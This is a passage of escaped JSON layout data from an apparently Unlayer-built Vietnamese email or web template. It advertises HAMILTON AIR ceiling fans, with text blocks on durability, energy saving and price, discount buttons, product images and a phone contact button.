d\\u1ee5ng.<\\/p>\\\"}},{\\\"id\\\":\\\"W25BFR04ut\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_6\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ecf0f1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"PU-IBD8k_i\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"6SBlRLNkDw\\\",\\\"contents\\\":[{\\\"id\\\":\\\"_s7AkbMQ6N\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"28px 33px 13px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 200%;\\\\\\\"><span style=\\\\\\\"font-size: 16px; line-height: 32px;\\\\\\\"><strong>S\\u1ea3n ph\\u1ea9m c\\u00f3 \\u0111\\u1ed9 b\\u1ec1n cao<\\/strong><\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 200%;\\\\\\\">\\u0110\\u1ed1i v\\u1edbi b\\u1ea5t k\\u1ec3 ng\\u01b0\\u1eddi ti\\u00eau d\\u00f9ng n\\u00e0o, y\\u1ebfu t\\u1ed1 \\u0111\\u1ed9 b\\u1ec1n lu\\u00f4n \\u0111\\u01b0\\u1ee3c ch\\u00fa tr\\u1ecdng. HAMILTON AIR th\\u1ef1c s\\u1ef1 \\u0111\\u00e3 mang \\u0111\\u1ebfn cho ng\\u01b0\\u1eddi mua m\\u1ed9t m\\u1eabu s\\u1ea3n ph\\u1ea9m v\\u01b0\\u1ee3t k\\u1ef3 v\\u1ecdng. S\\u1eed d\\u1ee5ng ch\\u1ea5t li\\u1ec7u c\\u00e1nh cao c\\u1ea5p, ch\\u1ed1ng cong v\\u00eanh, \\u0111\\u1ed9 b\\u1ec1n theo th\\u1eddi ti\\u1ebft.\\u00a0<\\/p>\\\\n<p style=\\\\\\\"line-height: 200%;\\\\\\\">Tuy nhi\\u00ean ng\\u01b0\\u1eddi d\\u00f9ng c\\u0169ng n\\u00ean quan t\\u00e2m kh\\u00f4ng n\\u00ean b\\u1eadt qu\\u1ea1t nhi\\u1ec1u gi\\u1edd v\\u00e0 v\\u1ec7 sinh qu\\u1ea1t th\\u01b0\\u1eddng xuy\\u00ean \\u0111\\u1ec3 gi\\u00fap t\\u0103ng \\u0111\\u1ed9 b\\u1ec1n ch\\u1eafc cho s\\u1ea3n ph\\u1ea9m.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"EPRA7YDQro\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/quattranvn.com\\/giam-gia\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#236fa1\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">T\\u00ecm hi\\u1ec3u th\\u00eam<\\/span>\\\",\\\"calculatedWidth\\\":129,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"HuVfTruxuh\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ILxo4Z3_oi\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371524407-quat-tran-abacus-60-canh-go-than-mau-trang.jpg\\\",\\\"width\\\":1200,\\\"height\\\":1372},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_15\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"hctWCoSRjS\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"b-B_VA58SJ\\\",\\\"contents\\\":[{\\\"id\\\":\\\"KQNZfdl2n9\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"qdHyZzHdxN\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px 33px 18px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 200%;\\\\\\\"><span style=\\\\\\\"font-size: 16px; line-height: 32px;\\\\\\\"><strong>Ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n n\\u0103ng t\\u1ed1i \\u0111a<\\/strong><\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 200%;\\\\\\\">\\u201d Con \\u00e1t ch\\u1ee7 b\\u00e0i \\u201d tung ra \\u0111\\u1ec3 PR cho m\\u1eabu s\\u1ea3n ph\\u1ea9m \\u0111\\u00f3 l\\u00e0 n\\u0103ng l\\u1ef1c ti\\u1ebft ki\\u1ec7m ng\\u00e2n s\\u00e1ch v\\u00e0 chi ph\\u00ed \\u0111i\\u1ec7n v\\u00e0 h\\u00e3ng \\u0111\\u00e3 kh\\u00f4ng l\\u00e0m ng\\u01b0\\u1eddi d\\u00f9ng tuy\\u1ec7t v\\u1ecdng. Ch\\u1ec9 mang hi\\u1ec7u su\\u1ea5t 35W, d\\u00f2ng qu\\u1ea1t s\\u1edf h\\u1eefu n\\u0103ng l\\u1ef1c ti\\u1ebft ki\\u1ec7m chi ph\\u00ed \\u0111i\\u1ec7n t\\u1ed1t nh\\u1ea5t.<\\/p>\\\\n<p style=\\\\\\\"line-height: 200%;\\\\\\\">B\\u1ea1n ho\\u00e0n to\\u00e0n c\\u00f3 th\\u1ec3 t\\u1ef1 do s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n m\\u00e0 kh\\u00f4ng c\\u1ea7n lo ng\\u1ea1i v\\u1ec1 \\u0111i\\u1ec7n n\\u0103ng m\\u1ed7i th\\u00e1ng.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"NDwH5n5zb_\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/quattranvn.com\\/giam-gia\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#236fa1\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_4\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">T\\u00ecm hi\\u1ec3u th\\u00eam<\\/span>\\\",\\\"calculatedWidth\\\":129,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_13\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"seCQJl2JpI\\\",\\\"contents\\\":[{\\\"id\\\":\\\"_HszwuIxeN\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371643116-quat-tran-katrina-52-gray-maple-wood.jpg\\\",\\\"width\\\":1200,\\\"height\\\":1372,\\\"autoWidth\\\":false,\\\"maxWidth\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_17\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_9\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"MPSGf7pAT7\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"T2AwAkvV85\\\",\\\"contents\\\":[{\\\"id\\\":\\\"5U52G-LXX5\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"1_Y-PHsazp\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"28px 33px 18px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 200%;\\\\\\\"><span style=\\\\\\\"font-size: 16px; line-height: 28px;\\\\\\\"><strong>Gi\\u00e1 c\\u1ea3 ph\\u1ea3i ch\\u0103ng<\\/strong><\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 200%;\\\\\\\">Gi\\u00e1 th\\u00e0nh lu\\u00f4n l\\u00e0 y\\u1ebfu t\\u1ed1 then ch\\u1ed1t \\u0111\\u1ec3 quy\\u1ebft \\u0111\\u1ecbnh. HAMILTON AIR \\u0111\\u01b0\\u1ee3c \\u0111i\\u1ec3m v\\u1edbi gi\\u00e1 ti\\u1ec1n h\\u00e0i h\\u00f2a v\\u00e0 h\\u1ee3p l\\u00fd v\\u1edbi ch\\u1ea5t l\\u01b0\\u1ee3ng, t\\u01b0\\u01a1ng th\\u00edch v\\u1edbi ng\\u01b0\\u1eddi ti\\u00eau d\\u00f9ng Vi\\u1ec7t.<\\/p>\\\\n<p style=\\\\\\\"line-height: 200%;\\\\\\\">\\u0110\\u00e2y th\\u1ef1c s\\u1ef1 l\\u00e0 t\\u00ean th\\u01b0\\u01a1ng hi\\u1ec7u qu\\u1ea1t m\\u00e0 b\\u1ea1n n\\u00ean chi\\u1ebfm h\\u1eefu cho kho\\u1ea3ng tr\\u1ed1ng s\\u1ed1ng c\\u1ee7a m\\u00e1i \\u1ea5m gia \\u0111\\u00ecnh m\\u00ecnh.<\\/p>\\\\n<p style=\\\\\\\"line-height: 200%;\\\\\\\">C\\u00e1c ki\\u1ec3u qu\\u1ea1t tr\\u1ea7n \\u0111ang gi\\u1ea3m gi\\u00e1 l\\u00ean \\u0111\\u1ebfn 20%<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"aZqtaldroB\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/quattranvn.com\\/giam-gia\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#236fa1\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_2\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">T\\u00ecm hi\\u1ec3u th\\u00eam<\\/span>\\\",\\\"calculatedWidth\\\":129,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"Kl73el7Ohg\\\",\\\"contents\\\":[{\\\"id\\\":\\\"xfHDmMCaEo\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371587605-nexus-60.jpg\\\",\\\"width\\\":680,\\\"height\\\":591,\\\"autoWidth\\\":false,\\\"maxWidth\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_16\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"#ecf0f1\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_10\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"TYDvAo7QXc\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KkKlsm36KR\\\",\\\"contents\\\":[{\\\"id\\\":\\\"KEcjyYNOWS\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_8\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"UbKJc3yALR\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"22px\\\",\\\"color\\\":\\\"#3d3434\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_8\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Tổ chức đào tạo WIT Bring the Best Value and Auto Comfort<\\/p>\\\"}},{\\\"id\\\":\\\"-3M3sEKxbS\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677919418531-du-an-tieu-bieu.png\\\",\\\"width\\\":900,\\\"height\\\":453,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"qTNIzinfel\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"phone\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\",\\\"phone\\\":\\\"02873033369\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"tel:{{phone}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#3AAEE0\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_5\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">T\\u01b0 v\\u1ea5n b\\u00e1n 